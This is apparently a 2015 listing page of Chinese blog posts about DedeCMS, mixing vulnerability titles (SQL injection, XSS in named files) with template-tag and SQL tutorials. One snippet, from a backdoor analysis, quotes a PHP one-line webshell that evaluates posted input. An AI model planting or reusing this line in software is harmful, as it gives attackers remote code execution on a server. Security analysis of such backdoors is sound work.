dedecms /member/edit_baseinfo.php SQL Injection Vul
分类:
数据库 时间:
2015-05-19 18:35:54
阅读次数:
179
dedecms /include/helpers/archive.helper.php SQL Injection Vul
分类:
数据库 时间:
2015-05-19 16:17:48
阅读次数:
261
一、php://input一句话木马在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)@eval(file_get_contents('php://input'))我是个...
分类:
Web程序 时间:
2015-05-19 12:41:25
阅读次数:
164
1.关键描述调用标签: 2.路径调用标签:{dede:field name='templeturl'/}{dede:global.cfg_templets_skin/}3.网站标题调用标签: dede:global name='cfg_webname'/}4.栏目导航调用标签:首页{dede:c.....
分类:
其他好文 时间:
2015-05-19 12:29:07
阅读次数:
131
今天要修改一个网站的栏目命名方法,因为网站的文章数目太多了,为了方便管理和优化把栏目尽量的扁平化简单化,就要修改dedecms生成页面的命名方法,100多个栏目一个一个改要改多久啊,就从网上找了一个sql批量修改命名的方法,随便也把其他dedecmssql命名方法也发上来:selectnamerul...
分类:
数据库 时间:
2015-05-19 10:23:56
阅读次数:
145
本文转载:http://www.mubanzhijia.com/jishujiaocheng/1.html关键描述调用标签:--------------------------------------------------------------------------------模板路径调用标签...
分类:
其他好文 时间:
2015-05-18 12:36:24
阅读次数:
150
dedecms里面有两个标签还是比较灵活的,一个是{dede:php}{/dede:php}另外一个是{dede:sql}标签,{dede:php}标签注释要用来在模板中写php代码的,{dede:sql}主要是用来调用sql用的,下面就来介绍下这两个标签到底该如何使用。该文章是转自百度空间的一篇文...
分类:
Web程序 时间:
2015-05-17 11:56:03
阅读次数:
101
dedecms /include/uploadsafe.inc.php SQL Injection Via Local Variable Overriding Vul
分类:
数据库 时间:
2015-05-16 17:51:26
阅读次数:
257
今天在研究dedecms,因为需要多表联查,只有通过sql语句来调用文档,可是用默认的[field:arcurl/]无法获取文档的链接地址,后经到网上搜寻,找到一套调用文档地址的办法,整理下面:大家知道,在Dede系统里面,我可以可以自由使用SQL语句来配合织梦标签进行更多的个性化调用。比如:推荐会...
分类:
其他好文 时间:
2015-05-16 16:25:32
阅读次数:
119
dedecms /plus/feedback_ajax.php、/templets/feedback_main.htm、/templets/feedback_edit.htm XSS && SQL Injection Vul
分类:
数据库 时间:
2015-05-16 16:15:20
阅读次数:
168
